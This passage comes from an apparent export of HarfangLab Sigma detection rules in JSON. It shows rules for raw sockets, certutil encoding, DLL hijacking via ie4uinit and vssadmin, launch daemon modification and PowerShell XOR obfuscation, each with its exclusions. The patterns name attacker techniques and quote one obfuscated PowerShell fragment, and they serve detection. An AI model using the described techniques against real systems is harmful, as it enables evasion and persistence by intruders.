ProcessCommandLine:\n - '/system/bin/ip6tables-restore --noflush -w -v'\n - '/system/bin/iptables-restore --noflush -w -v'\n\n 
exclusion_uv_python:\n ProcessImage|contains: '/.local/share/uv/python/'\n\n exclusion_cortex:\n ProcessCommandLine: '/opt/traps/bin/pmd'\n\n exclusion_sensugo:\n ProcessAncestors|contains:\n - '|/opt/sensugo/bin/sensu-agent.v*|'\n - '|/opt/sensugo/bin/sensu-backend.v*|'\n\n exclusion_zygote:\n ProcessParentImage: '/system/bin/app_process64'\n\n exclusion_icsscand:\n ProcessImage|endswith: '/icsscand/build/libicsneo-socketcan-daemon'\n\n exclusion_iptables:\n ProcessImage: '/system/bin/iptables'\n\n exclusion_zig_benchmark:\n ProcessCommandLine: 'zig-out/bin/benchmark'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "01cf0e26-1674-4236-aa42-024891c8915c", + "rule_name": "Raw Socket Created From Suspicious Path", + "rule_description": "Detects the creation of a raw socket from a suspicious path.\nRaw sockets are a special kind of socket that allow deep manipulation of network packets, either for inspection, filtering, custom protocols or packet forging.\nIt may hint at a malware trying to hide its traffic without having to open a port or using a custom protocol to communicate with its C2.\nIt is recommended to ensure the process who created this raw socket had a legitimate reason to do so and that the host wasn't compromised.\n", + "rule_creation_date": "2024-02-02", + "rule_modified_date": "2026-02-25", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.credential_access", + "attack.defense_evasion", + "attack.discovery", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1040", + "attack.t1095", + "attack.t1205.001", + "attack.t1572" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "01f3ffc6-8407-4fda-972a-7d8066ec1e3b", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.078393Z", + "creation_date": "2026-03-23T11:45:34.078395Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.078400Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://attack.mitre.org/techniques/T1140/" + ], + "name": "t1140_certutil_encoding_usage.yml", + "content": "title: Certutil Used for Encoding\nid: 01f3ffc6-8407-4fda-972a-7d8066ec1e3b\ndescription: |\n Detects the execution of certutil.exe to decode or encode data.\n This is often used by attackers to decode binaries hidden inside certificate files as Base64 or Hexadecimal information.\n It is recommended to check the content of the written file and the activity of the parent process for malicious behavior.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n - https://attack.mitre.org/techniques/T1140/\ndate: 2021/05/27\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.s0160\n - attack.t1140\n - classification.Windows.Source.ProcessCreation\n - 
classification.Windows.LOLBin.Certutil\n - classification.Windows.Behavior.Obfuscation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\certutil.exe'\n # Renamed binaries\n - OriginalFileName: 'CertUtil.exe'\n\n selection_cmd:\n CommandLine|contains:\n # Decode to BASE64\n - ' -decode '\n - ' /decode '\n\n # Encode to BASE64\n - ' -encode '\n - ' /encode '\n\n # Decode from hexadecimal\n - ' -decodehex '\n - ' /decodehex '\n\n # Encode to hexadecimal\n - ' -encodehex '\n - ' /encodehex '\n\n exclusion_glpi1:\n # GLPI-Agent keystore-export\n CommandLine: 'certutil -encode *.crt temp.cer'\n # C:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe\n GrandparentImage|endswith: '\\glpi-agent.exe'\n\n exclusion_glpi2:\n # GLPI-Agent keystore-export\n CommandLine:\n - 'certutil -encode *.crt temp.cer'\n - 'certutil -encode *.crt temp.cer ?'\n # C:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe\n CurrentDirectory: '?:\\Program Files\\GLPI-Agent\\var\\keystore-export-*\\'\n\n exclusion_pfu_scansnap:\n ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\PFU\\ScanSnap\\Home\\SshRegister.exe'\n - '?:\\Program Files (x86)\\PFU\\ScanSnap\\Driver\\PfuSsMon.exe'\n ProcessCommandLine: 'certutil -encodehex -f * content.json 1'\n\n exclusion_centralstage:\n ProcessGrandparentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n ProcessCommandLine: 'certutil -decode getsignatureinfo.base64 getsignatureinfo.ps1'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "01f3ffc6-8407-4fda-972a-7d8066ec1e3b", + "rule_name": "Certutil Used for Encoding", + "rule_description": "Detects the execution of certutil.exe to decode or encode data.\nThis is often used by attackers to decode binaries hidden inside certificate 
files as Base64 or Hexadecimal information.\nIt is recommended to check the content of the written file and the activity of the parent process for malicious behavior.\n", + "rule_creation_date": "2021-05-27", + "rule_modified_date": "2025-02-13", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1140" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "022246ff-42f6-4d06-8173-3c88a407926a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.592360Z", + "creation_date": "2026-03-23T11:45:34.592363Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.592371Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_ie4uinit.yml", + "content": "title: DLL Hijacking via ie4uinit.exe\nid: 
022246ff-42f6-4d06-8173-3c88a407926a\ndescription: |\n Detects potential Windows DLL Hijacking via ie4uinit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ie4uinit.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\IEADVPACK.dll'\n - '\\iedkcs32.dll'\n - '\\MLANG.dll'\n - '\\netapi32.dll'\n - '\\netutils.dll'\n - '\\urlmon.dll'\n - '\\WININET.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + 
"quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "022246ff-42f6-4d06-8173-3c88a407926a", + "rule_name": "DLL Hijacking via ie4uinit.exe", + "rule_description": "Detects potential Windows DLL Hijacking via ie4uinit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0247bb14-5962-4133-9181-cb2f419787f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.093612Z", 
+ "creation_date": "2026-03-23T11:45:34.093614Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.093619Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1543/004/" + ], + "name": "t1543_004_launch_daemons_modified.yml", + "content": "title: Launch Daemon Modified\nid: 0247bb14-5962-4133-9181-cb2f419787f1\ndescription: |\n Detects a modification of a launch daemon.\n Adversaries may modify existing launch daemons in order to install a backdoor.\n It is recommended to check if the process making the modification has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1543/004/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.004\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_process:\n ProcessImage|contains: '?'\n\n selection_kind_write:\n Kind: 'write'\n Path|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n\n selection_kind_rename:\n Kind: 'rename'\n TargetPath|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n\n filter_nosync:\n Path|contains: '.dat.nosync'\n\n filter_ds_store:\n Path|endswith: '/.DS_Store'\n\n exclusion_vim:\n Image: '/usr/bin/vim'\n\n exclusion_jamf:\n - Image: '/usr/local/jamf/bin/jamf'\n - ProcessGrandparentImage: 
'/usr/local/jamf/bin/jamf'\n - ProcessGrandparentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_installer:\n - ProcessCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox.??????/'\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/scripts/'\n - ProcessParentCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox.??????/'\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/scripts/'\n\n # used by a lot of installer\n exclusion_cp:\n Image: '/bin/cp'\n\n exclusion_bomgar:\n ProcessCommandLine|startswith:\n - '/bin/bash /Library/LaunchDaemons/.com.bomgar.bomgar-ps-*/mac_service_helper.sh'\n - '/Library/LaunchDaemons/.com.bomgar.bomgar-ps-*.helper/run.state'\n\n exclusion_desktop_services_priv:\n ProcessCommandLine:\n - '/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper'\n - '/system/library/privateframeworks/desktopservicespriv.framework/versions/a/resources/desktopserviceshelper'\n\n exclusion_finder:\n Image: '/system/library/coreservices/finder.app/contents/macos/finder'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n exclusion_eset:\n ProcessGrandparentImage: '/Applications/ESET Endpoint Security.app/Contents/MacOS/execd'\n\n exclusion_rsync:\n Image: '/usr/bin/rsync'\n\n condition: selection_version and selection_process and 1 of selection_kind_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0247bb14-5962-4133-9181-cb2f419787f1", + "rule_name": "Launch Daemon Modified", + "rule_description": "Detects a modification of a launch daemon.\nAdversaries may modify existing launch daemons in order to install a 
backdoor.\nIt is recommended to check if the process making the modification has legitimate reasons to do so.\n", + "rule_creation_date": "2024-06-18", + "rule_modified_date": "2025-10-29", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1543.004", + "attack.t1647" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "027c5f6b-cba7-426c-af04-233b87967507", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.593375Z", + "creation_date": "2026-03-23T11:45:34.593378Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.593386Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_vssadmin.yml", + "content": "title: DLL Hijacking via vssadmin.exe\nid: 
027c5f6b-cba7-426c-af04-233b87967507\ndescription: |\n Detects potential Windows DLL Hijacking via vssadmin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vssadmin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "027c5f6b-cba7-426c-af04-233b87967507", + "rule_name": "DLL Hijacking via vssadmin.exe", + 
"rule_description": "Detects potential Windows DLL Hijacking via vssadmin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "029996a2-753c-4bd1-ac20-b8f180acbf90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-24T07:14:08.491571Z", + "creation_date": "2026-03-23T11:45:34.624842Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.624846Z", + 
"rule_level": "medium", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://redcanary.com/blog/yellow-cockatoo/", + "https://redcanary.com/threat-detection-report/techniques/powershell/", + "https://attack.mitre.org/techniques/T1059/001/", + "https://attack.mitre.org/techniques/T1027/" + ], + "name": "t1059_001_powershell_xor_obfuscation_script.yml", + "content": "title: PowerShell XOR Obfuscation\nid: 029996a2-753c-4bd1-ac20-b8f180acbf90\ndescription: |\n Detects the use of the -bxor (byte XOR) encoding in a PowerShell script.\n This is often used by attackers to load their payloads in PowerShell scripts as to avoid having them in cleartext, which would trigger security solutions.\n It is recommended to use tools like CyberChef or to look in telemetry to obtain the cleartext version of the payload and analyze it.\n If the script is benign, it is highly recommended to whitelist it using parts of the script or its path if possible.\nreferences:\n - https://redcanary.com/blog/yellow-cockatoo/\n - https://redcanary.com/threat-detection-report/techniques/powershell/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/\ndate: 2021/06/24\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1027\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n # seen in PowerShell commandlines : ;$_-bXoR$S[($S[$I]+$S[$H])%256]}};\n selection:\n PowershellCommand|contains: '-bxor'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_remote_exchange:\n PowershellCommand|contains|all:\n - 'function ExportPSSessionAndImportModule'\n - 'hashValue -bxor 
?CurrentUserRemotePSSettings.Hash'\n # function ExportPSSessionAndImportModule ($remotePSSettinsPath, $modulePath, [switch]$AllowClobber)\n # {\n # $hashValue = $global:remoteSession.ApplicationPrivateData.ImplicitRemoting.Hash\n # $CurrentUserRemotePSSettings = Get-ItemProperty -path $remotePSSettinsPath -ErrorAction SilentlyContinue\n # # PS3.0, Get-ItemProperty will return DWORD data as UInt32, instead of Int32 in PS2.0.\n # # If $hashValue is negative, (CurrentUserRemotePSSettings.Hash -ne $hashValue) will always be $true\n # # We use bitwise xor operation to work around\n # if (($CurrentUserRemotePSSettings -eq $null) `\n # -or ($CurrentUserRemotePSSettings.Hash -eq $null) `\n # -or (-not ($CurrentUserRemotePSSettings.ModulePath)) `\n # -or (($hashValue -bxor $CurrentUserRemotePSSettings.Hash) -ne 0))\n # {\n # # Redo Everything, when:\n # # 1. No registry entry found, or\n # # 2. Registry entry exists, but hash value or ModulePath is empty (which is very unlikely) or\n exclusion_sentinel_one:\n # C:\\Program Files\\SentinelOne\\Sentinel Agent 21.6.2.272\\SentinelPie.bin\n PowershellScriptPath: '?:\\Program Files\\SentinelOne\\Sentinel Agent *\\SentinelPie.bin'\n\n exclusion_defender:\n # C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\Firewall.psm1\n - PowershellCommand|contains:\n - 'xor between (2^32 - 1) and (2^(32-cidr) - 1) giving a binary with (32-cidr) leading bits ON'\n - '[ipaddress]([math]::pow(2, 32) -1 -bxor'\n - 'pow(2, 32) -1 -bxor [math]::pow(2, (32 - $cidr))-1)'\n - ProcessParentImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\SenseIR.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseCM.exe'\n\n exclusion_desktop_ini_hidden:\n # https://github.com/Vincoll/PS_NetworkShortcutTreeview\n # https://github.com/pauby/oxygen\n 
PowershellCommand|contains|all:\n - 'Desktop.ini'\n - '-Name Attributes -Value ([IO.FileAttributes]::System -bxor [IO.FileAttributes]::Hidden'\n\n # https://www.powershellgallery.com/packages/dbatools/1.1.103/Content/functions%5CInvoke-DbaDbDecryptObject.ps1\n exclusion_dbatool1:\n PowershellCommand|contains|all:\n - 'function Invoke-DecryptData() {'\n - '# Loop through each of the characters and apply an XOR to decrypt the data'\n - '# Compare the byte string character to the key character using XOR'\n - '# Create array list to hold the results'\n exclusion_dbatool2:\n PowershellCommand|contains|all:\n - 'function Get-DbaProductKey {'\n - '.SYNOPSIS'\n exclusion_dbatool3:\n PowershellCommand|contains|all:\n - 'function Find-DbaInstance {'\n - '.SYNOPSIS'\n\n exclusion_ixbs_apps:\n ProcessGrandparentImage:\n - '?:\\SRCI\\iXBs_Applications\\iXBus Serveur\\Plugins\\\\*\\service.exe'\n - '?:\\SRCI\\iXBs_Applications\\iXBus Server\\Plugins\\\\*\\service.exe'\n\n exclusion_modules:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\'\n - '?:\\program files\\powershell\\7\\Modules\\'\n - '?:\\Program Files (x86)\\Spiceworks Agent Shell\\modules\\Inventory Module\\'\n\n exclusion_cyberwatch:\n - ProcessImage|endswith: 'CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'CYBERWATCH SAS'\n - ProcessParentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_ansible:\n - ProcessGrandparentCommandLine|contains:\n - 'powershell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand '\n - 'powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand '\n - 'powershell.exe -noninteractive -encodedcommand '\n ProcessAncestors|contains:\n - '?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe'\n - 
'?:\\Windows\\System32\\OpenSSH\\sshd.exe|?:\\Windows\\System32\\services.exe'\n - ProcessCommandLine|contains: 'powershell.exe -noninteractive -encodedcommand '\n ProcessAncestors|contains: '?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe'\n - PowershellCommand|contains: '$module = [Ansible.Basic.AnsibleModule]::Create($args, $spec)'\n\n exclusion_schedule:\n - ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_log4net:\n - PowershellScriptPath|endswith: '\\Log4Net-Module\\Log4Net-Module.psm1'\n - PowershellCommand|contains|all:\n - '# Example of File Appender initialization'\n - '$Log = [log4net.LogManager]::GetLogger(\"root\");'\n - '# $Log.$Level($Message); # Ne fonctionnait pas sous 2012 non R2 PS3.0'\n - '[log4net.LogManager]::ResetConfiguration();'\n\n exclusion_ninjarmm:\n PowershellScriptPath: '?:\\ProgramData\\NinjaRMMAgent\\scripting\\\\*.ps1'\n\n # https://github.com/DanysysTeam/PS-SFTA/blob/master/SFTA.ps1\n exclusion_sfta:\n PowershellCommand|contains|all:\n - 'https://github.com/DanysysTeam/PS-SFTA'\n - 'function Get-FTA {'\n - 'Write-Output (( $iValue -shr $iCount) -bxor 0xFFFF0000)'\n\n exclusion_sysvol:\n PowershellScriptPath|contains: '\\sysvol\\\\*\\Policies\\{????????-????-????-????-????????????}\\User\\Scripts\\'\n\n exclusion_avacee:\n ProcessParentImage: '?:\\Program Files\\Avacee\\sip_agent\\SIPAgent.exe'\n\n exclusion_wybot:\n ProcessParentImage: '?:\\Program Files\\osquery\\\\*.exe'\n Signed: 'true'\n Signature: 'WYBOT SAS'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "029996a2-753c-4bd1-ac20-b8f180acbf90", + "rule_name": "PowerShell XOR Obfuscation", + "rule_description": "Detects the use of the -bxor (byte XOR) encoding 
in a PowerShell script.\nThis is often used by attackers to load their payloads in PowerShell scripts as to avoid having them in cleartext, which would trigger security solutions.\nIt is recommended to use tools like CyberChef or to look in telemetry to obtain the cleartext version of the payload and analyze it.\nIf the script is benign, it is highly recommended to whitelist it using parts of the script or its path if possible.\n", + "rule_creation_date": "2021-06-24", + "rule_modified_date": "2026-03-20", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1027", + "attack.t1059.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "029b4b5e-5b84-4646-ae2b-9c19d795c627", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + 